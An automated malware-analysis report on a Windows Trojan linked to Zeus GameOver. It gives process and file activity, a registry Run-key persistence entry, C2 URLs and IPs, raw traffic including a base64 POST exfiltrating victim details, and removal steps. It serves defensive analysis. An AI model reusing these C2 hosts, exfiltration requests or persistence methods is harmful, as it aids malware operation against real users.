MD5: 000a8fff3dc7e5ee339acd7651e61389
SHA1: 8ea3631a532f4a2f8175e4604790d5b2cc4bf20f
SHA256: fd34939bdd9cf5ea9a89ae28668b13da840154eb427cff950a0ffa5f063ac55c
SSDeep: 6144:X1p9JPd0OmBRGezfbsNCuqkBPZxo4Wx2Pqe:H9JP d6ezfbsNCTihxzWpe
Size: 272384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-04-29 21:56:08
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process %original file name%.exe:344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)

The process qfjlkyhjspng.exe:4348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

The process edxqdqrjinn.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)

The process edxqdqrjinn.exe:5332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)

The Trojan deletes the following file(s):

%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)

Registry activity

The process %original file name%.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 33 C3 FC F0 18 9E 4B 26 B1 8D 41 D4 D2 26 8D"

The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE A2 A6 D5 FE B6 E5 FA 9F F6 DB 69 C5 B8 34 1D"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"

The process edxqdqrjinn.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 15 81 A8 A9 CA 88 35 6F 21 06 0F A0 CF 22 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://machineanimal.net/index.php	72.52.4.91
hxxp://machineproblem.net/index.php	184.168.221.34
hxxp://figureproblem.net/index.php	98.139.135.198

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Zeus GameOver Possible DGA NXDOMAIN Responses

Traffic

GET /index.php HTTP/1.0

Accept: */*

Connection: close

Host: machineproblem.net

HTTP/1.1 302 Found

Connection: close

Pragma: no-cache

cache-control: no-cache

Location: /index.php

POST /index.php HTTP/1.0

Accept: */*

Connection: close

Host: figureproblem.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 197

post=aG9jaHJlaW5qQGNpdGlmaW5hbmNpYWwuY29tCWhnc3l3bGR6agllZHhxZHFyamlubi5leGUJcWZqbGt5aGpzcG5nLmV4ZQlUcmFwIENyZWRlbnRpYWwgRmlsdGVyaW5nIEt0bVJtCVBhbmVsIFJlcG9ydHMgVGFibGV0IFRyYW5zYWN0aW9uCTAwNQ==
HTTP/1.0 200 OK

Date: Fri, 26 Jun 2015 15:08:45 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1
..O.:.......7.'....."...J......X.....TiL.....t....f...==dgv.._e..O....
.U..L l<%"O{.|%rs......v....B`.(.:V,c......._0.;.......Q(0.,BV...T.
.7. FF......AI.%..`....l...D.......$".......v1mG.F_Za...........L.?..E
....Jx...z.G.A.....dt......c.......6.0..O"hI&..2%-../z..N..s.}........
Z.P.....Z.C..0.[...... 2-..C...q`..S)...$....L~..tM...0..Q...O.q$J.7~.
p.:qF5_..b...E...o..n...p....h.L...E.._...j={.... ......Y-V.K..:....}i
..._.Yh.....)qq,..H....^....P.F..:%....''(0{.h,7.o..TV.H....?.d..o6...
y.Y....V.n_>z.jy.]=..Gq...r...G.*..)Gp2.,.I.'o.....$....k.Ywb.J..1O
...W..`...8......O.W....}........T...........T.......(j.....t..r3i....
A.{..U.>.j......,[.....L._<x...m..e.....[.....=.8......f A..Rw.h
.x...."...-.p')C._.......<.mJ..o...VO..-........7.?..U8......AQ.I..
..7. ...,..".|:.hJ.I.p.F..|WC!Z...9..]..k'..\M>..%..Qc.]..vM....7'c
;.f.....RG.3.y.Cd8O.7.7w.^...Nl..31..{...RC...Ia...'.Y..lC.g.....T..^S
I..} .......")%.Y...."..M.\...L......I.GE=.....;...x..E..._.g.C2._.UBH
..._a$.{.....|...|.:.ll.iL.1.N}...Hd.2.x..8..,w.u..U6.NWZO..<V.5...
-x.h...>...I.f...MB..p.<.P3..3X...oZ)...H..z.......6.#./..wI.p|.
.../.{......zOSJ..%.>!..cfY.....(...5FF.l...-..O.Q.z.e2.7...o....#.
 ..2cW8 .(.........,.Y.v.Q......FH.z...|..O...~.....o.../.._.R..V.....
..0.Y.qr.W.Q.%oJw.I...4...........E.<.... ..
<<< skipped >>>

GET /index.php HTTP/1.0

Accept: */*

Connection: close

Host: figureproblem.net

HTTP/1.0 200 OK

Date: Fri, 26 Jun 2015 15:08:44 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: ATS/5.0.1
..O.:.......7.'....."...J......X.....TiL.....t....f...==dgv.._e..O....
.U..L l<%"O{.|%rs......v....B`.(.:V,c......._0.;.......Q(0.,BV...T.
.7. FF......AI.%..`....l...D.......$".......v1mG.F_Za...........L.?..E
....Jx...z.G.A.....dt......c.......6.0..O"hI&..2%-../z..N..s.}........
Z.P.....Z.C..0.[...... 2-..C...q`..S)...$....L~..tM...0..Q...O.q$J.7~.
p.:qF5_..b...E...o..n...p....h.L...E.._...j={.... ......Y-V.K..:....}i
..._.Yh.....)qq,..H....^....P.F..:%....''(0{.h,7.o..TV.H....?.d..o6...
y.Y....V.n_>z.jy.]=..Gq...r...G.*..)Gp2.,.I.'o.....$....k.Ywb.J..1O
...W..`...8......O.W....}........T...........T.......(j.....t..r3i....
A.{..U.>.j......,[.....L._<x...m..e.....[.....=.8......f A..Rw.h
.x...."...-.p')C._.......<.mJ..o...VO..-........7.?..U8......AQ.I..
..7. ...,..".|:.hJ.I.p.F..|WC!Z...9..]..k'..\M>..%..Qc.]..vM....7'c
;.f.....RG.3.y.Cd8O.7.7w.^...Nl..31..{...RC...Ia...'.Y..lC.g.....T..^S
I..} .......")%.Y...."..M.\...L......I.GE=.....;...x..E..._.g.C2._.UBH
..._a$.{.....|...|.:.ll.iL.1.N}...Hd.2.x..8..,w.u..U6.NWZO..<V.5...
-x.h...>...I.f...MB..p.<.P3..3X...oZ)...H..z.......6.#./..wI.p|.
.../.{......zOSJ..%.>!..cfY.....(...5FF.l...-..O.Q.z.e2.7...o....#.
 ..2cW8 .(.........,.Y.v.Q......FH.z...|..O...~.....o.../.._.R..V.....
..0.Y.qr.W.Q.%oJw.I...4...........E.<.... ....D...g.......i....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.reloc

32.df

?w/

zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb

*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl

uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo

B%[email protected]

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GetProcessWindowStation

operator

GDI32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetProcessHeap

PeekNamedPipe

KERNEL32.dll

zcÁ

%Documents and Settings%\%current user%

C:\hgsywldzj\

c:\%original file name%.exe

00F0O0Y0f0

<$<7<?<\<

6%6-656@6

7!7)71797

6%7U7Z7b7m7u7

=!=)=.=4=9=

4%5s8`9

emscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

2.exe

edxqdqrjinn.exe_3580:

.text

`.rdata

@.data

.reloc

32.df

?w/

zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb

*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl

uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo

B%[email protected]

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GetProcessWindowStation

operator

GDI32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetProcessHeap

PeekNamedPipe

KERNEL32.dll

zcÁ

%Documents and Settings%\LocalService

C:\hgsywldzj\

C:\hgsywldzj\qfjlkyhjspng.exe

g9tohctbfmbl "c:\hgsywldzj\edxqdqrjinn.exe"

C:\hgsywldzj\edxqdqrjinn.exe

00F0O0Y0f0

<$<7<?<\<

6%6-656@6

7!7)71797

6%7U7Z7b7m7u7

=!=)=.=4=9=

4%5s8`9

emscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

2.exe

qfjlkyhjspng.exe_4348:

.text

`.rdata

@.data

.reloc

32.df

?w/

zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb

*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl

uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo

B%[email protected]

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GetProcessWindowStation

operator

GDI32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetProcessHeap

PeekNamedPipe

KERNEL32.dll

zcÁ

%Documents and Settings%\LocalService

C:\hgsywldzj\

C:\hgsywldzj\qfjlkyhjspng.exe

00F0O0Y0f0

<$<7<?<\<

6%6-656@6

7!7)71797

6%7U7Z7b7m7u7

=!=)=.=4=9=

4%5s8`9

emscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

2.exe

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:344
   qfjlkyhjspng.exe:4348
   ewrrwkxzfemuscomjih.exe:2564
   edxqdqrjinn.exe:3580
   edxqdqrjinn.exe:5332

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
   C:\hgsywldzj\icmjbyxsy1 (12 bytes)
   C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
   C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
   C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
   C:\hgsywldzj\qnglq0unrq (84 bytes)
   

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.